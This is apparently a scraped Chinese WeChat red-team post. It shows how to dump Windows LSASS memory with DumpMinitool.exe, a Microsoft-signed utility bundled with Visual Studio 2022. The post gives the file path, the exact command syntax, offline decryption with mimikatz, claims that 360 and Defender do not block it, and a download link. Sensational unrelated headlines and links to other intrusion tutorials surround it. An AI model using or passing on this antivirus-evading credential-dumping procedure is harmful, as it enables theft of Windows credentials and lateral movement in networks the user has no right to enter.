终究没有人在意一家民营企业的生死

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

【少儿禁】马建《亮出你的舌苔或空空荡荡》

网友建议:远离举报者李X夫!

网曝黑人留学生侮辱中国女生是“母狗”,网友愤慨:不欢迎洋垃圾

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具

HACK学习君 HACK学习君 2022-11-02

消息来源推特,推特博主:mr.d0x

https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=twOtT_clemvEYGQ9YdZ02w

可以自行安装Visual Studio2022,然后访问路径,把工具拖出来使用即可,也可以直接在文末获取下载地址



转储 LSASS,该工具文件路径:

C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

文件名:DumpMinitool.exe

参数区分大小写

使用命令:

DumpMinitool.exe --file dump.txt --processId xxx --dumpType Full--file 输出的路径--processId lsass.exe进程的ID--dumpType 方式

查看lsass进程ID

dump完成后,再使用mimikatz进行离线解密即可

mimikatz

微软的数字签名


免杀测试:360和Win10自带的defender杀软均不拦截。


沙箱检测

微步在线




下载地址:


链接:https://pan.baidu.com/s/18IRSjJaM4d2fwjmK9zfQFg

提取码:tfz4


点赞,转发,在看


全网最全的 Cobalt Strike 使用教程-内网渗透之横向渗透篇(上)
OrcaC2!Websocket加密C&C框架
免杀 | 初学者的mimikatz免杀制作教程
CVE到内网然后拿下4个域控
一款免杀横向移动命令执行测试工具

文章有问题?点此查看未经处理的缓存